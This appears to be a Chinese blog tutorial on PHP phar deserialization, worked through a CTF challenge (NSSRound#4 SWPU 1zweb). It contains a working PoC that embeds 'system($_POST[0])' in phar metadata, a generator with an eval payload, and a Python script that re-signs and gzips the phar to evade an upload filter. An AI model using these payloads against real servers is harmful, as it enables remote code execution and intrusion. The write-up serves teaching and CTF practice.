一.什么是phar文件

类比java语言

JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。

PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件

对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。

文件包含:phar伪协议,可读取 .phar文件。

二.phar文件结构

phar文件分为四个部分:

php反序列化漏洞——phar反序列化漏洞-LMLPHP

Phar协议解析文件时,会自动触发对manifest字段的序列化字符串进行反序列化

三.用php语言生成一个phar文件

<?php
highlight_file(__FILE__); // 将当前PHP文件的内容进行语法高亮并输出到页面上

class Testobj // 定义一个名为 Testobj 的类
{
    var $output=''; // 声明一个属性 $output,初始值为空字符串
}

@unlink('test.phar');   // 删除之前的 test.phar 文件(如果有),@ 符号用于抑制可能出现的文件不存在的警告
$phar=new Phar('test.phar');  // 创建一个名为 test.phar 的 PHAR 文件对象
$phar->startBuffering();  // 开始写入 PHAR 文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  // 使用 setStub 方法设置 PHAR 文件的启动器(stub),__HALT_COMPILER(); 是 PHP 的特殊标记,表示文件编译的结束
$o=new Testobj(); // 创建了一个 Testobj 类的实例
$o->output='eval($_GET["a"]);'; // 将字符串 'eval($_GET["a"]);' 赋值给 $o 对象的 $output 属性
$phar->setMetadata($o);// 将 $o 对象作为元数据写入到 PHAR 文件中,这种方法不再安全,可能导致安全漏洞
$phar->addFromString("test.txt","test");  // 向 PHAR 文件中添加一个名为 test.txt 的文件,文件内容为字符串 "test"
$phar->stopBuffering(); // 停止写入 PHAR 文件
?>

四.漏洞生成原因

manifest 压缩文件的属性等信息,以序列化存储;存在一段序列化的字符串;

调用phar伪协议,可读取 .phar文件,Phar协议解析文件时,会自动触发对manifest字段的序列化;

字符串进行反序列化Phar需要 PHP >= 5.2 在php.ini中将phar.readonly设为Off(注意去掉前面的分号)

php反序列化漏洞——phar反序列化漏洞-LMLPHP

phar产生条件

1.phar文件能上传到服务器端
2.要有可用反序列化魔术方法作为跳板
3.要有文件操作函数,如file exists(),fopen(),file_get_contents()
4.文件操作函数参数可控,且:、/、phar等特殊字符没有被过滤

例题

[NSSRound#4 SWPU]1zweb

php反序列化漏洞——phar反序列化漏洞-LMLPHP

查询文件 输入文件名 可得源码

index.php

<?php
class LoveNss
{
  public $ljt;
  public $dky;
  public $cmd;
  public function __construct()
  {
    $this->ljt = "ljt";
    $this->dky = "dky";
    phpinfo();
  }
  public function __destruct()
  {
    if ($this->ljt === "Misc" && $this->dky === "Re")
      eval($this->cmd);
  }
  public function __wakeup()
  {
    $this->ljt = "Re";
    $this->dky = "Misc";
  }
}
$file = $_POST['file'];
if (isset($_POST['file'])) {
  if (preg_match("/flag/", $file)) {
    die("nonono");
  }
  echo file_get_contents($file);
}

upload.php

<?php
if ($_FILES["file"]["error"] > 0) {
  echo "上传异常";
} else {
  $allowedExts = array("gif", "jpeg", "jpg", "png");
  $temp = explode(".", $_FILES["file"]["name"]);
  $extension = end($temp);
  if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))) {
    $content = file_get_contents($_FILES["file"]["tmp_name"]);
    $pos = strpos($content, "__HALT_COMPILER();");
    if (gettype($pos) === "integer") {
      echo "ltj一眼就发现了phar";
    } else {
      if (file_exists("./upload/" . $_FILES["file"]["name"])) {
        echo $_FILES["file"]["name"] . " 文件已经存在";
      } else {
        $myfile = fopen("./upload/" . $_FILES["file"]["name"], "w");
        fwrite($myfile, $content);
        fclose($myfile);
        echo "上传成功 ./upload/" . $_FILES["file"]["name"];
      }
    }
  } else {
    echo "dky不喜欢这个文件 ." . $extension;
  }
}

upload限制了phar文件的上传。同时设置了白名单,只允许png,jpg,gif文件上传.

绕过phar限制
php识别phar文件是通过其文件头的stub,更确切一点来说是识别__HALT_COMPILER();?>这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀。

只要将phar文件使用 gzip 命令进行压缩,这段代码就会消失。

phar由data,data签名(20位),和签名格式(8位)组成。

生成phar文件,同时放入010增加属性数量来绕过weak_up

poc

<?php

class LoveNss
{
  public $ljt;
  public $dky;
  public $cmd;

  public function __construct()
  {
    $this->ljt = "Misc";
    $this->dky = "Re";
    $this->cmd = 'system($_POST[0]);';
  }
}

$o = new LoveNss();
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new LoveNss();
$phar->setMetadata($o); //将自定义的meta-data存入manifest,setMetadata()会将对象进行序列化
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering(); //签名自动计算
#本题要将生成得phar文件放入010修改属性数量来绕过weak_up
#php.ini中phar.readonly改成Off

php反序列化漏洞——phar反序列化漏洞-LMLPHP

修改后标签修复

默认用sha1方式修复

为了绕过这里文件头

php反序列化漏洞——phar反序列化漏洞-LMLPHP

用gzip方式压缩文件

from hashlib import sha1
import gzip

with open('phar.png', 'rb') as file:
    f = file.read()
s = f[:-28]  # 获取要签名的数据
h = f[-8:]  # 获取签名类型以及GBMB标识1
new_file = s + sha1(s).digest() + h  # 数据 + 签名 + (类型 + GBMB)
f_gzip = gzip.GzipFile("2.png", "wb")
f_gzip.write(new_file)
f_gzip.close()

php反序列化漏洞——phar反序列化漏洞-LMLPHP

上传成功后

用phar伪协议访问

04-02 05:43